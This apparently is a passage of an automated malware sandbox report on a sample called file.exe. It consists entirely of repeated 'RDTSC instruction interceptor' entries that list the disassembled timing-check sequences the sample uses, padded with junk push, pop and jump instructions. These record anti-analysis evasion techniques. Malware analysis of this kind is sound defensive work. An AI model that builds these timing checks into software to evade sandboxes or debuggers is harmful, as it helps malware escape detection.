              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 918152 second address: 918167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007F052CEB1F16h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop ebx 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 918167 second address: 91816B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E0B93 second address: 8E0B98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E0B98 second address: 8E0B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E0B9E second address: 8BEE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D335Dh], edi 0x00000010 call dword ptr [ebp+122D1B3Fh] 0x00000016 push edi 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F052CEB1F1Bh 0x0000001f popad 0x00000020 pop edi 0x00000021 pushad 0x00000022 jmp 00007F052CEB1F25h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F052CEB1F1Fh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E0CF2 second address: 8E0CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E109C second address: 8E10A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F052CEB1F16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E10A6 second address: 8E10AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E1240 second address: 8E1244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E1244 second address: 8E1254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F052CBC2106h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E1254 second address: 8E1267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F052CEB1F1Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E1267 second address: 8E126B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E15A4 second address: 8E15A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E1B72 second address: 8E1BB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC2118h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F052CBC210Ah 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F052CBC2118h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E1BB9 second address: 8E1BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F052CEB1F16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E1BC7 second address: 8E1BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E1E2D second address: 8E1E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8E1E45 second address: 8E1E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC210Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8BF9A4 second address: 8BF9AE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 917666 second address: 917670 instructions: 0x00000000 rdtsc 0x00000002 js 00007F052CBC2106h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9178ED second address: 9178F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9178F3 second address: 9178F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89C49E second address: 89C4A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D0A0 second address: 91D0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D0A6 second address: 91D0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D0AA second address: 91D100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F052CBC2112h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jnp 00007F052CBC2106h 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pop edi 0x0000001b pushad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e jmp 00007F052CBC210Bh 0x00000023 popad 0x00000024 pushad 0x00000025 js 00007F052CBC2106h 0x0000002b jmp 00007F052CBC2116h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D267 second address: 91D26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D26D second address: 91D29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F052CBC2106h 0x0000000a popad 0x0000000b pushad 0x0000000c jl 00007F052CBC2106h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F052CBC2117h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D29B second address: 91D2A0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D3CF second address: 91D3EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC2112h 0x00000007 jg 00007F052CBC2118h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D562 second address: 91D566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D821 second address: 91D829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D829 second address: 91D83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F052CEB1F1Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D83A second address: 91D844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F052CBC2106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91D844 second address: 91D86F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F1Dh 0x00000007 jmp 00007F052CEB1F22h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007F052CEB1F1Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91DC84 second address: 91DC88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91DC88 second address: 91DC8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91DC8C second address: 91DC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91DE14 second address: 91DE19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91DFC0 second address: 91DFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F052CBC2112h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 921765 second address: 92176B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92176B second address: 921775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F052CBC2106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 921775 second address: 92177B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 89910B second address: 899111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9240BC second address: 9240C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9243B0 second address: 9243D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC2118h 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jnc 00007F052CBC2106h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9243D7 second address: 9243E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F052CEB1F16h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9243E8 second address: 9243F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 jnl 00007F052CBC2106h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92670F second address: 926713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 926713 second address: 926719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 926719 second address: 92671F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92671F second address: 92675D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F052CBC210Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F052CBC2108h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F052CBC2118h 0x0000001c jc 00007F052CBC2106h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92675D second address: 926774 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9268B4 second address: 9268BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9268BC second address: 9268CC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92BC71 second address: 92BC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F052CBC2106h 0x0000000d jmp 00007F052CBC210Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92BF38 second address: 92BF56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F052CEB1F21h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92BF56 second address: 92BF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92BF5B second address: 92BF63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92BF63 second address: 92BF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92BF67 second address: 92BF6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92FFA9 second address: 92FFB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92FFB3 second address: 92FFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92F69C second address: 92F6A6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F052CBC2112h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92F978 second address: 92F97E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92F97E second address: 92F982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92F982 second address: 92F996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F052CEB1F18h 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92F996 second address: 92F99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 92F99A second address: 92F99E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9331D4 second address: 9331E4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F052CBC2106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9331E4 second address: 9331E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9331E8 second address: 933200 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007F052CBC2106h 0x00000011 je 00007F052CBC2106h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 933200 second address: 93320D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F052CEB1F16h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93320D second address: 933216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 933360 second address: 933366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 933366 second address: 93336C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93336C second address: 933383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F052CEB1F1Dh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 933383 second address: 933387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9337EE second address: 9337F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9337F4 second address: 9337FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9337FC second address: 933802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 933968 second address: 93398C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F052CBC211Eh 0x00000008 jmp 00007F052CBC2118h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93398C second address: 933990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93BD9D second address: 93BDB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F052CBC2106h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93BDB1 second address: 93BDB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 939DFD second address: 939E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F052CBC2106h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F052CBC2106h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93A0CA second address: 93A0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93A3A5 second address: 93A3C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F052CBC2118h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93A3C2 second address: 93A3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CEB1F1Ch 0x00000009 jmp 00007F052CEB1F1Eh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F052CEB1F1Ch 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93A99F second address: 93A9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC210Dh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93B2CC second address: 93B2D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93B2D0 second address: 93B2DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93B2DC second address: 93B2E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93B82B second address: 93B835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93FBFC second address: 93FC06 instructions: 0x00000000 rdtsc 0x00000002 js 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 93FC06 second address: 93FC17 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pushad 0x00000007 jno 00007F052CBC2106h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94012A second address: 94012E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94012E second address: 940138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9403EB second address: 9403F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F052CEB1F16h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9403F7 second address: 9403FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 944E1D second address: 944E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94D551 second address: 94D556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 94B8BA second address: 94B8BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
